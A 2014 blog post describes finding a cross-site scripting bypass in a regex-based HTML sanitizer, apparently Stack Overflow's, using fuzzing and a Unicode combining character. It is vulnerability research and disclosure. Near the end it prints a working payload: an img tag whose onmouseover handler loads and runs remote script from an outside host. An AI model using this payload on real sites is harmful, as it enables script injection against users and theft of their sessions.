Hacking stackoverflow.com's HTML sanitizer
Published: 2014-02-19
Finding the code for the sanitizer
While looking around for more things to mess with, I came across a post by Jeff Atwood that mentioned an HTML sanitizer he'd written.
"I was able to write a no-nonsense, special purpose HTML sanitizer in about 25 lines of code"
Guessing that this might be the code used by Stack Overflow to sanitize the HTML, I figured I'd see if it had any weaknesses.
Here's what it looked like:
private static Regex _tags = new Regex("<[^>]*(>|$)",
    RegexOptions.Singleline | RegexOptions.ExplicitCapture | RegexOptions.Compiled);

private static Regex _whitelist = new Regex(@"
    ^</?(a|b(lockquote)?|code|em|h(1|2|3)|i|li|ol|p(re)?|s(ub|up|trong|trike)?|ul)>$
    |^<(b|h)r\s?/?>$
    |^<a[^>]+>$
    |^<img[^>]+/?>$",
    RegexOptions.Singleline | RegexOptions.IgnorePatternWhitespace |
    RegexOptions.ExplicitCapture | RegexOptions.Compiled);

/// <summary>
/// sanitize any potentially dangerous tags from the provided raw HTML input using
/// a whitelist based approach, leaving the "safe" HTML tags
/// </summary>
public static string Sanitize(string html)
{
    var tagname = "";
    Match tag;

    var tags = _tags.Matches(html);

    // iterate through all HTML tags in the input
    for (int i = tags.Count - 1; i > -1; i--)
    {
        tag = tags[i];
        tagname = tag.Value.ToLower();

        if (!_whitelist.IsMatch(tagname))
        {
            // not on our whitelist? I SAY GOOD DAY TO YOU, SIR. GOOD DAY!
            html = html.Remove(tag.Index, tag.Length);
        }
        else if (tagname.StartsWith("<a"))
        {
            // detailed <a> tag checking
            if (!IsMatch(tagname,
                @"<a\s
                href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
                (\stitle=""[^""]+"")?\s?>"))
            {
                html = html.Remove(tag.Index, tag.Length);
            }
        }
        else if (tagname.StartsWith("<img"))
        {
            // detailed <img> tag checking
            if (!IsMatch(tagname,
                @"<img\s
                src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
                (\swidth=""\d{1,3}"")?
                (\sheight=""\d{1,3}"")?
                (\salt=""[^""]*"")?
                (\stitle=""[^""]*"")?
                \s?/?>"))
            {
                html = html.Remove(tag.Index, tag.Length);
            }
        }
    }

    return html;
}
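If you want to poke at this logic yourself, here's a rough Python re-creation of the C# sanitizer above (my own port, not Stack Overflow's code). One big caveat: .NET and Python differ in exactly the ways this post is about, since Python's str.startswith is an ordinal comparison while .NET's StartsWith is culture-sensitive by default, so this port does not reproduce the bug; it's just handy for experimenting with the whitelist.

```python
import re

# Rough Python port of the C# sanitizer above (an approximation, not the
# real thing). Python's ordinal startswith differs from .NET's
# culture-sensitive StartsWith, so the combining-character bug is absent.

_tags = re.compile(r'<[^>]*(?:>|$)', re.S)
_whitelist = re.compile(
    r'^</?(?:a|b(?:lockquote)?|code|em|h[123]|i|li|ol|p(?:re)?'
    r'|s(?:ub|up|trong|trike)?|ul)>$'
    r'|^<(?:b|h)r\s?/?>$'
    r'|^<a[^>]+>$'
    r'|^<img[^>]+/?>$', re.S)
_a_detail = re.compile(
    r'<a\shref="(?:#\d+|(?:https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)"'
    r'(?:\stitle="[^"]+")?\s?>', re.S)
_img_detail = re.compile(
    r'<img\ssrc="https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+"'
    r'(?:\swidth="\d{1,3}")?(?:\sheight="\d{1,3}")?'
    r'(?:\salt="[^"]*")?(?:\stitle="[^"]*")?\s?/?>', re.S)

def sanitize(html: str) -> str:
    # walk the tags back to front so removals don't shift earlier indices
    for tag in reversed(list(_tags.finditer(html))):
        tagname = tag.group().lower()
        if not _whitelist.match(tagname):
            html = html[:tag.start()] + html[tag.end():]
        elif tagname.startswith('<a') and not _a_detail.match(tagname):
            html = html[:tag.start()] + html[tag.end():]
        elif tagname.startswith('<img') and not _img_detail.match(tagname):
            html = html[:tag.start()] + html[tag.end():]
    return html
```

For example, sanitize('<b>hi</b><script>alert(1)</script>') leaves '<b>hi</b>alert(1)', and this port does strip the combining-character payload described below, because Python's ordinal startswith still routes it into the detailed <img> check.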
So… what's the problem?
I didn't immediately see anything wrong with Jeff's approach… so I tried to write some code that was smarter than me:
while(true) {
    // Generate a bunch of random HTML by concatenating tags,
    // attributes and random characters
    string testHtml = GenerateTestHtml();
    string sanitizedHtml = Sanitize(testHtml);

    // See if the "sanitized" HTML contains anything that looks
    // dangerous, like a <script> tag, or a tag with an event
    // handler
    if(LooksDangerous(sanitizedHtml)) {
        Output(testHtml, sanitizedHtml);
        break;
    }
}
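The post doesn't show GenerateTestHtml or LooksDangerous, so here's one plausible shape for them, sketched in Python; the fragment pool and the "dangerous" heuristic are my guesses, not the original code:

```python
import random
import re

# Hypothetical stand-ins for the GenerateTestHtml / LooksDangerous helpers;
# the fragment pool and the danger heuristic here are guesses.
FRAGMENTS = ['<', '>', '/', '"', '=', ' ', 'img', 'a', 'href',
             'onmouseover', 'script', '\u030a', 'x']

def generate_test_html(rng: random.Random, length: int = 40) -> str:
    # glue random tag fragments, attributes and odd characters together
    return ''.join(rng.choice(FRAGMENTS) for _ in range(length))

_danger = re.compile(r'<script|\son\w+\s*=', re.I)

def looks_dangerous(html: str) -> bool:
    # crude check: did a <script> tag or an on* event-handler
    # attribute survive sanitization?
    return _danger.search(html) is not None
```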
I ran this, and in a few seconds… I got a hit!
Unfortunately, the input it found was several thousand characters long, and mostly looked like noise… so I had to write a little more code:
for(int i = testHtml.Length - 1; i >= 0; i--) {
    string modified = testHtml.Remove(i, 1);

    // See if the input still results in
    // dangerous looking HTML
    if(LooksDangerous(Sanitize(modified))) {
        testHtml = modified;
    }
}
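That shrinking loop generalizes to a tiny standalone helper; in this Python sketch (mine, not the post's), still_fails stands in for the LooksDangerous(Sanitize(...)) check:

```python
def minimize(s: str, still_fails) -> str:
    # Walk backwards over the string, deleting one character at a time
    # and keeping every deletion that preserves the interesting behavior.
    i = len(s) - 1
    while i >= 0:
        candidate = s[:i] + s[i + 1:]
        if still_fails(candidate):
            s = candidate
        i -= 1
    return s
```

For instance, minimize('aa<img x>bb', lambda t: '<img' in t) boils the input down to just '<img'.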
After running that, the long input had boiled down to this:
<img ̊ onmouseover="">
Interesting. What is the ̊ character doing there?
If we check that input against different parts of the sanitization code, we see that

Regex.IsMatch("<img ̊ onmouseover=\"\">", @"^<img[^>]+/?>$") == true

… but …

"<img ̊ onmouseover=\"\">".StartsWith("<img") == false
Why is this? Well, ̊ is a combining character, so depending on how you interpret the string, it might look like <img ̊ or <img̊.
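You can see half of this discrepancy from any regex engine; the sketch below (Python, my own illustration) shows that U+030A is a combining mark and that it sails straight through the [^>]+ in the whitelist pattern. The other half, StartsWith returning false, is specific to .NET's culture-sensitive string comparison, which treats base-plus-combining sequences as units; Python's ordinal startswith does not behave that way.

```python
import re
import unicodedata

tag = '<img \u030a onmouseover="">'  # U+030A COMBINING RING ABOVE

# To the regex, the combining mark is just another "not a >" character,
# so the tag passes the whitelist's img branch...
assert re.match(r'^<img[^>]+/?>$', tag)

# ...even though it's a zero-width mark that glues onto the preceding
# character when the string is read as graphemes.
print(unicodedata.category('\u030a'))  # Mn: a nonspacing (combining) mark

# Python's startswith compares code units ordinally, so here the prefix
# check still succeeds; .NET's culture-sensitive StartsWith is what fails.
assert tag.startswith('<img')
```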
That discrepancy meant that the tag could pass the whitelist, but was never subjected to the "detailed <img> tag checking".
How would you exploit this?
There are undoubtedly lots of bad things you could do; one example would be:
<img ̊
style="display:block;width:100%;height:100%;"
onmouseover="$.getScript('http://danlec.com/xss.js')"
>
Should have known…
Interestingly, the somewhat famous answer to a question about using RegEx to parse HTML makes heavy use of combining characters.
Maybe bobince was trying to tell us something…
About the author:
I'm Daniel LeCheminant, a developer at Trello Inc.